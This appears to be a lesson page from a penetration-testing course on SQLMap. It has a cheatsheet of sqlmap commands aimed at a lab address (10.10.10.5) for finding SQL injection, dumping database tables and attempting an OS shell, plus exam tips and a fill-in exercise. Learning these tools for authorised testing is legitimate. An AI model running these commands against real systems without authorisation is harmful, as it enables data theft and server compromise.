Dashboard › Modules › SQLMap Essentials

SQLMap Essentials

Web

> Start Learning

📖 Overview

Automated SQL injection with SQLMap.

🎯

Exercises

🃏

Flashcards

🗺️

Mind Maps

📋 Cheatsheet

Basic Usage

sqlmap -u 'http://10.10.10.5/page?id=1' --batch # Basic scan with default options

POST Request

sqlmap -u http://10.10.10.5/login --data='user=a&pass=b' -p user # Scan POST parameter 'user'

With Cookie

sqlmap -u URL --cookie='PHPSESSID=abc123' # Scan with authenticated session cookie

Enumeration

sqlmap -u URL --dbs # Enumerate databases
sqlmap -u URL -D dbname --tables # Enumerate tables in DB
sqlmap -u URL -D db -T table --dump # Dump table data

OS Shell

sqlmap -u URL --os-shell # Attempt to get OS shell

💻 Command Examples

⚠️ Common Pitfalls

Not using --batch
Missing WAF bypass

💡 Exam Survival Tips

Use --level=5 --risk=3 if needed
Save request to file with -r

🎯 Exercises

View All

fill command medium

Write the sqlmap command to dump the database 'webapp' table 'users' from a vulnerable URL:...

🗺️ Mind Maps

SQLMap Automation

Save Your Progress

SQLMap Essentials

📖 Overview

📋 Cheatsheet

Basic Usage

POST Request

With Cookie

Enumeration

OS Shell

💻 Command Examples

⚠️ Common Pitfalls

💡 Exam Survival Tips

🎯 Exercises

🗺️ Mind Maps